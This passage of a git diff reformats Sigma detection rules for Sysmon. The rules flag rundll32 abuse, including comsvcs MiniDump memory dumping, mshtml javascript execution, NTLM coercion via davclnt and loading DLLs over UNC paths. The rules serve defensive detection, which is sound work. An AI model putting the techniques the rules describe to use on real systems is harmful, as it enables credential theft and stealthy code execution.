is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt author: Florian Roth (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - javascript - ..\..\mshtml,RunHTMLApplication selection2: - CommandLine|contains: ;document.write();GetObject("script + CommandLine|contains: ;document.write();GetObject("script condition: process_creation and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml index 6644d7a6d..8965ac536 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml @@ -1,8 +1,7 @@ title: Suspicious Key Manager Access id: a4694263-59a8-4608-a3a0-6f8d3a51664c status: test -description: Detects the invocation of the Stored User Names and Passwords dialogue - (Key Manager) +description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) references: - https://twitter.com/NinjaParanoid/status/1516442028963659777 author: Florian Roth (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - keymgr - KRShowKeyMgr condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml index a7afd6eaa..e1d269f5e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml @@ -1,12 +1,10 @@ title: Mshtml DLL RunHTMLApplication Abuse id: 4782eb5a-a513-4523-a0ac-f3082b26ac5c related: - - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 - type: derived + - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 + type: derived status: test -description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication - export to run arbitrary code via different protocol handlers (vbscript, javascript, - file, htpp...) +description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...) references: - https://twitter.com/n1nj4sec/status/1421190238081277959 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \..\ - mshtml - RunHTMLApplication diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml index 711ec7b98..67458a951 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without CommandLine Parameters id: 1775e15e-b61b-4d14-a1a3-80981298085a status: experimental -description: Detects suspicious start of rundll32.exe without any parameters as found - in CobaltStrike beacon activity +description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity references: - https://www.cobaltstrike.com/help-opsec - https://twitter.com/ber_m1ng/status/1397948048135778309 @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: + CommandLine|endswith: - \rundll32.exe - \rundll32.exe" - \rundll32 diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml index d03bf3afb..8c6f3d687 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml @@ -1,8 +1,7 @@ title: Suspicious NTLM Authentication on the Printer Spooler Service id: bb76d96b-821c-47cf-944b-7ce377864492 status: test -description: Detects a privilege elevation attempt by coercing NTLM authentication - on the Printer Spooler service +description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service references: - https://twitter.com/med0x2e/status/1520402518685200384 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -22,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - C:\windows\system32\davclnt.dll,DavSetCookie - http - CommandLine|contains: + CommandLine|contains: - spoolss - srvsvc - /print/pipe/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml index 6091fdbea..48708b3cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml @@ -17,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: + CommandLine|contains: - '#+' - '#-' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml index cad600c83..74c668ef2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml @@ -1,9 +1,7 @@ title: Rundll32 Spawned Via Explorer.EXE id: 1723e720-616d-4ddc-ab02-f7e3685a4713 status: experimental -description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. - This has been observed by variants of Raspberry Robin, as first reported by Red - Canary. +description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. references: - https://redcanary.com/blog/raspberry-robin/ - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -23,11 +21,11 @@ detection: selection_parent: ParentImage|endswith: \explorer.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_generic: - - CommandLine|contains: ' C:\Windows\System32\' - - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' + - CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required + - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml index 430b47ed5..f5c2f339e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml @@ -1,11 +1,10 @@ title: Process Memory Dump Via Comsvcs.DLL id: 646ea171-dded-4578-8a4d-65e9822892e3 related: - - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c - type: obsoletes + - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c + type: obsoletes status: test -description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering - multiple different techniques (ordinal, minidump function, etc.) +description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) references: - https://twitter.com/shantanukhande/status/1229348874298388484 - https://twitter.com/pythonresponder/status/1385064506049630211?s=21 @@ -32,25 +31,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - comsvcs - full - CommandLine|contains: + CommandLine|contains: - '#-' - '#+' - '#24' - '24 ' - - MiniDump + - MiniDump # Matches MiniDump and MinidumpW selection_generic: - CommandLine|contains|all: + CommandLine|contains|all: - '24' - comsvcs - full - CommandLine|contains: + CommandLine|contains: - ' #' - ',#' - ', #' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml index cb494d5f5..e7e69995e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml @@ -21,13 +21,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - '-sta ' - '-localserver ' - CommandLine|contains|all: + CommandLine|contains|all: - '{' - '}' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml index 96a19f2c9..a429dbf3d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml @@ -20,21 +20,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - :\RECYCLER\ - - :\SystemVolumeInformation\ - - Image|startswith: - - C:\Windows\Tasks\ - - C:\Windows\debug\ - - C:\Windows\fonts\ - - C:\Windows\help\ - - C:\Windows\drivers\ - - C:\Windows\addins\ - - C:\Windows\cursors\ - - C:\Windows\system32\tasks\ + - Image|contains: + - :\RECYCLER\ + - :\SystemVolumeInformation\ + - Image|startswith: + - C:\Windows\Tasks\ + - C:\Windows\debug\ + - C:\Windows\fonts\ + - C:\Windows\help\ + - C:\Windows\drivers\ + - C:\Windows\addins\ + - C:\Windows\cursors\ + - C:\Windows\system32\tasks\ condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml index 2558dfa21..1f5d94d4d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml @@ -20,18 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: rundll32 + CommandLine|contains: rundll32 selection2: - CommandLine|contains: + CommandLine|contains: - mshtml,RunHTMLApplication - mshtml,#135 selection3: - CommandLine|contains: + CommandLine|contains: - 'javascript:' - 'vbscript:' condition: process_creation and (all of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml index fab3fcabc..aab7577ef 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml @@ -1,12 +1,7 @@ title: Suspicious Rundll32 Setupapi.dll Activity id: 285b85b1-a555-4095-8652-a8a4106af63f status: test -description: setupapi.dll library provide InstallHinfSection function for processing - INF files. INF file may contain instructions allowing to create values in the - registry, modify files and install drivers. This technique could be used to obtain - persistence via modifying one of Run or RunOnce registry keys, run process or - use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll - calls runonce.exe executable regardless of actual content of INF file. +description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. references: - https://lolbas-project.github.io/lolbas/Libraries/Setupapi/ - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf @@ -39,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Scripts and administrative tools that use INF files for driver installation - with setupapi.dll + - Scripts and administrative tools that use INF files for driver installation with setupapi.dll level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml index 21faba436..9f9d774bc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml @@ -20,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - shell32.dll - Control_RunDLL - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%LocalAppData%' - '%Temp%' diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml index e86d0ef34..a8c774085 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml @@ -1,8 +1,7 @@ title: Potential ShellDispatch.DLL Functionality Abuse id: 82343930-652f-43f5-ab70-2ee9fdd6d5e9 status: experimental -description: Detects potential "ShellDispatch.dll" functionality abuse to execute - arbitrary binaries via "ShellExecute" +description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" references: - https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ author: X__Junior (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: RunDll_ShellExecuteW + CommandLine|contains: RunDll_ShellExecuteW condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml index 4798771d6..569a1fb35 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml @@ -1,8 +1,7 @@ title: RunDLL32 Spawning Explorer id: caa06de8-fdef-4c91-826a-7f9e163eef4b status: test -description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, - often observes Gamarue spawning the explorer.exe process in an unusual way +description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way references: - https://redcanary.com/blog/intelligence-insights-november-2021/ author: elhoim, CD_ROM_ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml index 9f78e384a..b64beae81 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml @@ -1,17 +1,15 @@ title: Potentially Suspicious Rundll32 Activity id: e593cf51-88db-4ee1-b920-37e89012a3c9 status: test -description: Detects suspicious execution of rundll32, with specific calls to some - DLLs with known LOLBIN functionalities +description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities references: - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/ - https://twitter.com/Hexacorn/status/885258886428725250 - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52 - - https://twitter.com/nas_bench/status/1433344116071583746 - - https://twitter.com/eral4m/status/1479106975967240209 - - https://twitter.com/eral4m/status/1479080793003671557 -author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron - Systems) + - https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut + - https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib + - https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen +author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/05/17 tags: @@ -26,91 +24,89 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - 'javascript:' - - .RegisterXLL - - CommandLine|contains|all: - - url.dll - - OpenURL - - CommandLine|contains|all: - - url.dll - - OpenURLA - - CommandLine|contains|all: - - url.dll - - FileProtocolHandler - - CommandLine|contains|all: - - zipfldr.dll - - RouteTheCall - - CommandLine|contains|all: - - shell32.dll - - Control_RunDLL - - CommandLine|contains|all: - - shell32.dll - - ShellExec_RunDLL - - CommandLine|contains|all: - - mshtml.dll - - PrintHTML - - CommandLine|contains|all: - - advpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - advpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieadvpack.dll - - LaunchINFSection - - CommandLine|contains|all: - - ieadvpack.dll - - RegisterOCX - - CommandLine|contains|all: - - ieframe.dll - - OpenURL - - CommandLine|contains|all: - - shdocvw.dll - - OpenURL - - CommandLine|contains|all: - - syssetup.dll - - SetupInfObjectInstallAction - - CommandLine|contains|all: - - setupapi.dll - - InstallHinfSection - - CommandLine|contains|all: - - pcwutl.dll - - LaunchApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbApplication - - CommandLine|contains|all: - - dfshim.dll - - ShOpenVerbShortcut - - CommandLine|contains|all: - - scrobj.dll - - GenerateTypeLib - - http - - CommandLine|contains|all: - - shimgvw.dll - - ImageView_Fullscreen - - http - - CommandLine|contains|all: - - comsvcs.dll - - MiniDump + - CommandLine|contains|all: + - 'javascript:' + - .RegisterXLL + - CommandLine|contains|all: + - url.dll + - OpenURL + - CommandLine|contains|all: + - url.dll + - OpenURLA + - CommandLine|contains|all: + - url.dll + - FileProtocolHandler + - CommandLine|contains|all: + - zipfldr.dll + - RouteTheCall + - CommandLine|contains|all: + - shell32.dll + - Control_RunDLL + - CommandLine|contains|all: + - shell32.dll + - ShellExec_RunDLL + - CommandLine|contains|all: + - mshtml.dll + - PrintHTML + - CommandLine|contains|all: + - advpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - advpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieadvpack.dll + - LaunchINFSection + - CommandLine|contains|all: + - ieadvpack.dll + - RegisterOCX + - CommandLine|contains|all: + - ieframe.dll + - OpenURL + - CommandLine|contains|all: + - shdocvw.dll + - OpenURL + - CommandLine|contains|all: + - syssetup.dll + - SetupInfObjectInstallAction + - CommandLine|contains|all: + - setupapi.dll + - InstallHinfSection + - CommandLine|contains|all: + - pcwutl.dll + - LaunchApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbApplication + - CommandLine|contains|all: + - dfshim.dll + - ShOpenVerbShortcut + - CommandLine|contains|all: + - scrobj.dll + - GenerateTypeLib + - http + - CommandLine|contains|all: + - shimgvw.dll + - ImageView_Fullscreen + - http + - CommandLine|contains|all: + - comsvcs.dll + - MiniDump filter_main_screensaver: - CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver - filter_main_parent_cpl: + CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver + filter_main_parent_cpl: # Settings ParentImage: C:\Windows\System32\control.exe ParentCommandLine|contains: .cpl - CommandLine|contains|all: + CommandLine|contains|all: - Shell32.dll - Control_RunDLL - .cpl filter_main_startmenu: ParentImage: C:\Windows\System32\control.exe - CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL - "C:\Windows\System32\' - CommandLine|endswith: .cpl", + CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\' + CommandLine|endswith: .cpl", condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml index 3753e12c0..13fd019a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml @@ -1,8 +1,7 @@ title: Suspicious Control Panel DLL Load id: d7eb979b-c2b5-4a6f-a3a7-c87ce6763819 status: test -description: Detects suspicious Rundll32 execution from control.exe as used by Equation - Group and Exploit Kits +description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits references: - https://twitter.com/rikvduijn/status/853251879320662017 - https://twitter.com/felixw3000/status/853354851128025088 @@ -23,10 +22,10 @@ detection: selection_parent: ParentImage|endswith: \System32\control.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter: - CommandLine|contains: Shell32.dll + CommandLine|contains: Shell32.dll condition: process_creation and (all of selection_* and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml index 8dbc82000..8da1777a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml @@ -1,11 +1,10 @@ title: Suspicious Rundll32 Execution With Image Extension id: 4aa6040b-3f28-44e3-a769-9208e5feb5ec related: - - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e - type: similar + - id: 089fc3d2-71e8-4763-a8a5-c97fbb0a403e + type: similar status: experimental -description: Detects the execution of Rundll32.exe with DLL files masquerading as - image files +description: Detects the execution of Rundll32.exe with DLL files masquerading as image files references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Hieu Tran @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.exe + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .bmp - .cr2 - .eps diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml index e8d8ca234..c72444667 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml @@ -1,11 +1,10 @@ title: Suspicious Usage Of ShellExec_RunDLL id: d87bd452-6da1-456e-8155-7dc988157b7d related: - - id: 36c5146c-d127-4f85-8e21-01bf62355d5a - type: obsoletes + - id: 36c5146c-d127-4f85-8e21-01bf62355d5a + type: obsoletes status: test -description: Detects suspicious usage of the ShellExec_RunDLL function to launch other - commands as seen in the the raspberry-robin attack +description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack references: - https://redcanary.com/blog/raspberry-robin/ - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -24,9 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_openasrundll: - CommandLine|contains: ShellExec_RunDLL + CommandLine|contains: ShellExec_RunDLL selection_suspcli: - CommandLine|contains: + CommandLine|contains: + # Add more LOLBINs and Susp Paths - regsvr32 - msiexec - \Users\Public\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml index 90faa2e9a..86d1a8967 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml @@ -18,23 +18,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - apphelp.dll selection1b: - CommandLine|contains: + CommandLine|contains: - ShimFlushCache - '#250' selection2a: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - kernel32.dll selection2b: - CommandLine|contains: + CommandLine|contains: - BaseFlushAppcompatCache - '#46' - condition: process_creation and (( selection1a and selection1b ) or ( selection2a - and selection2b )) + condition: process_creation and (( selection1a and selection1b ) or ( selection2a and selection2b )) fields: - Image - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml index d3fa9dbc8..cf658c119 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_sys.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Activity Invoking Sys File id: 731231b9-0b5d-4219-94dd-abb6959aa7ea status: test -description: Detects suspicious process related to rundll32 based on command line - that includes a *.sys file as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: rundll32.exe + CommandLine|contains: rundll32.exe selection2: - CommandLine|contains: + CommandLine|contains: - .sys, - '.sys ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml index cbdd8c817..6c5bde1da 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml @@ -1,8 +1,7 @@ title: Rundll32 UNC Path Execution id: 5cdb711b-5740-4fb2-ba88-f7945027afac status: test -description: Detects rundll32 execution where the DLL is located on a remote location - (share) +description: Detects rundll32 execution where the DLL is located on a remote location (share) references: - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code author: Nasreddine Bencherchali (Nextron Systems) @@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: ' \\\\' + CommandLine|contains: ' \\\\' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml index 311d3355c..cfc0ab4c0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution With Uncommon DLL Extension id: c3a99af4-35a9-4668-879e-c09aeb4f2bdf status: experimental -description: Detects the execution of rundll32 with a command line that doesn't contain - a common extension +description: Detects the execution of rundll32 with a command line that doesn't contain a common extension references: - https://twitter.com/mrd0x/status/1481630810495139841?s=12 author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou @@ -20,21 